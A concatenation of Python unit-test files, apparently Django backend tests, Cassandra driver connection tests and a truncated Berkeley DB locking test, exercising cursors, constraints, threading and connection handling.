EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connection = connection.copy()
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data
without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be
able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
test_connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from functools import partial
from mock import patch
import logging
from six.moves import range
import sys
import threading
from threading import Thread, Event
import time
from unittest import SkipTest
from cassandra import ConsistencyLevel, OperationTimedOut
from cassandra.cluster import NoHostAvailable, ConnectionShutdown, Cluster, ExecutionProfile, EXEC_PROFILE_DEFAULT
import cassandra.io.asyncorereactor
from cassandra.io.asyncorereactor import AsyncoreConnection
from cassandra.protocol import QueryMessage
from cassandra.connection import Connection
from cassandra.policies import HostFilterPolicy, RoundRobinPolicy, HostStateListener
from cassandra.pool import HostConnectionPool
from tests import is_monkey_patched
from tests.integration import use_singledc, PROTOCOL_VERSION, get_node, CASSANDRA_IP, local, \
requiresmallclockgranularity, greaterthancass20
try:
from cassandra.io.libevreactor import LibevConnection
import cassandra.io.libevreactor
except ImportError:
LibevConnection = None
log = logging.getLogger(__name__)
def setup_module():
use_singledc()
class ConnectionTimeoutTest(unittest.TestCase):
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION,
execution_profiles=
{EXEC_PROFILE_DEFAULT: ExecutionProfile(
load_balancing_policy=HostFilterPolicy(
RoundRobinPolicy(), predicate=lambda host: host.address == CASSANDRA_IP
)
)
}
)
self.session = self.cluster.connect()
def tearDown(self):
self.cluster.shutdown()
@patch('cassandra.connection.Connection.max_in_flight', 2)
def test_in_flight_timeout(self):
"""
Test to ensure that connection id fetching will block when max_id is reached/
In previous versions of the driver this test will cause a
NoHostAvailable exception to be thrown, when the max_id is restricted
@since 3.3
@jira_ticket PYTHON-514
@expected_result When many requests are run on a single node connection acquisition should block
until connection is available or the request times out.
@test_category connection timeout
"""
futures = []
query = '''SELECT * FROM system.local'''
for _ in range(100):
futures.append(self.session.execute_async(query))
for future in futures:
future.result()
class TestHostListener(HostStateListener):
host_down = None
def on_down(self, host):
self.host_down = True
def on_up(self, host):
self.host_down = False
class HeartbeatTest(unittest.TestCase):
"""
Test to validate failing a heartbeat check doesn't mark a host as down
@since 3.3
@jira_ticket PYTHON-286
@expected_result host should be marked down when heartbeat fails. This
happens after PYTHON-734
@test_category connection heartbeat
"""
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, idle_heartbeat_interval=1)
self.session = self.cluster.connect(wait_for_all_pools=True)
def tearDown(self):
self.cluster.shutdown()
@local
@greaterthancass20
def test_heart_beat_timeout(self):
# Setup a host listener to ensure the nodes don't go down
test_listener = TestHostListener()
host = "127.0.0.1:9042"
node = get_node(1)
initial_connections = self.fetch_connections(host, self.cluster)
self.assertNotEqual(len(initial_connections), 0)
self.cluster.register_listener(test_listener)
# Pause the node
try:
node.pause()
# Wait for connections associated with this host go away
self.wait_for_no_connections(host, self.cluster)
# Wait to seconds for the driver to be notified
time.sleep(2)
self.assertTrue(test_listener.host_down)
# Resume paused node
finally:
node.resume()
# Run a query to ensure connections are re-established
current_host = ""
count = 0
while current_host != host and count < 100:
rs = self.session.execute_async("SELECT * FROM system.local", trace=False)
rs.result()
current_host = str(rs._current_host)
count += 1
time.sleep(.1)
self.assertLess(count, 100, "Never connected to the first node")
new_connections = self.wait_for_connections(host, self.cluster)
self.assertFalse(test_listener.host_down)
# Make sure underlying new connections don't match previous ones
for connection in initial_connections:
self.assertFalse(connection in new_connections)
def fetch_connections(self, host, cluster):
# Given a cluster object and host grab all connection associated with that host
connections = []
holders = cluster.get_connection_holders()
for conn in holders:
if host == str(getattr(conn, 'host', '')):
if isinstance(conn, HostConnectionPool):
if conn._connections is not None and len(conn._connections) > 0:
connections.append(conn._connections)
else:
if conn._connection is not None:
connections.append(conn._connection)
return connections
def wait_for_connections(self, host, cluster):
retry = 0
while(retry < 300):
retry += 1
connections = self.fetch_connections(host, cluster)
if len(connections) is not 0:
return connections
time.sleep(.1)
self.fail("No new connections found")
def wait_for_no_connections(self, host, cluster):
retry = 0
while(retry < 100):
retry += 1
connections = self.fetch_connections(host, cluster)
if len(connections) is 0:
return
time.sleep(.5)
self.fail("Connections never cleared")
class ConnectionTests(object):
klass = None
def setUp(self):
self.klass.initialize_reactor()
def get_connection(self, timeout=5):
"""
Helper method to solve automated testing issues within Jenkins.
Officially patched under the 2.0 branch through
17998ef72a2fe2e67d27dd602b6ced33a58ad8ef, but left as is for the
1.0 branch due to possible regressions for fixing an
automated testing edge-case.
"""
conn = None
e = None
for i in range(5):
try:
contact_point = CASSANDRA_IP
conn = self.klass.factory(endpoint=contact_point, timeout=timeout, protocol_version=PROTOCOL_VERSION)
break
except (OperationTimedOut, NoHostAvailable, ConnectionShutdown) as e:
continue
if conn:
return conn
else:
raise e
def test_single_connection(self):
"""
Test a single connection with sequential requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
event = Event()
def cb(count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, count))
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, 0))
event.wait()
def test_single_connection_pipelined_requests(self):
"""
Test a single connection with pipelined requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
responses = [False] * 100
event = Event()
def cb(response_list, request_num, *args, **kwargs):
response_list[request_num] = True
if all(response_list):
conn.close()
event.set()
for i in range(100):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=i,
cb=partial(cb, responses, i))
event.wait()
def test_multiple_connections(self):
"""
Test multiple connections with pipelined requests.
"""
conns = [self.get_connection() for i in range(5)]
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(event, conn, count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=count,
cb=partial(cb, event, conn, count))
for event, conn in zip(events, conns):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, event, conn, 0))
for event in events:
event.wait()
def test_multiple_threads_shared_connection(self):
"""
Test sharing a single connections across multiple threads,
which will result in pipelined requests.
"""
num_requests_per_conn = 25
num_threads = 5
event = Event()
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(all_responses, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(map(all, all_responses)):
conn.close()
event.set()
def send_msgs(all_responses, thread_responses):
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, all_responses, thread_responses, i))
all_responses = []
threads = []
for i in range(num_threads):
thread_responses = [False] * num_requests_per_conn
all_responses.append(thread_responses)
t = Thread(target=send_msgs, args=(all_responses, thread_responses))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
event.wait()
def test_multiple_threads_multiple_connections(self):
"""
Test several threads, each with their own Connection and pipelined
requests.
"""
num_requests_per_conn = 25
num_conns = 5
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(conn, event, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(thread_responses):
conn.close()
event.set()
def send_msgs(conn, event):
thread_responses = [False] * num_requests_per_conn
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, conn, event, thread_responses, i))
event.wait()
threads = []
for i in range(num_conns):
conn = self.get_connection()
t = Thread(target=send_msgs, args=(conn, events[i]))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
@requiresmallclockgranularity
def test_connect_timeout(self):
# Underlying socket implementations don't always throw a socket timeout even with min float
# This can be timing sensitive, added retry to ensure failure occurs if it can
max_retry_count = 10
exception_thrown = False
for i in range(max_retry_count):
start = time.time()
try:
conn = self.get_connection(timeout=sys.float_info.min)
conn.close()
except Exception as e:
end = time.time()
self.assertAlmostEqual(start, end, 1)
exception_thrown = True
break
self.assertTrue(exception_thrown)
def test_subclasses_share_loop(self):
if self.klass not in (AsyncoreConnection, LibevConnection):
raise SkipTest
class C1(self.klass):
pass
class C2(self.klass):
pass
clusterC1 = Cluster(connection_class=C1)
clusterC1.connect(wait_for_all_pools=True)
clusterC2 = Cluster(connection_class=C2)
clusterC2.connect(wait_for_all_pools=True)
self.addCleanup(clusterC1.shutdown)
self.addCleanup(clusterC2.shutdown)
self.assertEqual(len(get_eventloop_threads(self.event_loop_name)), 1)
def get_eventloop_threads(name):
all_threads = list(threading.enumerate())
log.debug('all threads: {}'.format(all_threads))
log.debug('all names: {}'.format([thread.name for thread in all_threads]))
event_loops_threads = [thread for thread in all_threads if name == thread.name]
return event_loops_threads
class AsyncoreConnectionTests(ConnectionTests, unittest.TestCase):
klass = AsyncoreConnection
event_loop_name = "asyncore_cassandra_driver_event_loop"
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test asyncore with monkey patching")
ConnectionTests.setUp(self)
def clean_global_loop(self):
cassandra.io.asyncorereactor._global_loop._cleanup()
cassandra.io.asyncorereactor._global_loop = None
class LibevConnectionTests(ConnectionTests, unittest.TestCase):
klass = LibevConnection
event_loop_name = "event_loop"
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test libev with monkey patching")
if LibevConnection is None:
raise unittest.SkipTest(
'libev does not appear to be installed properly')
ConnectionTests.setUp(self)
def clean_global_loop(self):
cassandra.io.libevreactor._global_loop._cleanup()
cassandra.io.libevreactor._global_loop = None
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from .test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
import sys
if sys.version_info[:3] < (2, 4, 0):
def assertTrue(self, expr, msg=None):
self.failUnless(expr,msg=msg)
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test01_simple..." % self.__class__.__name__)
anID = self.env.lock_id()
if verbose:
print("locker ID: %s" % anID)
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print("Aquired lock: %s" % lock)
self.env.lock_put(lock)
if verbose:
print("Released lock: %s" % lock)
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test02_threaded..." % self.__class__.__name__)
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
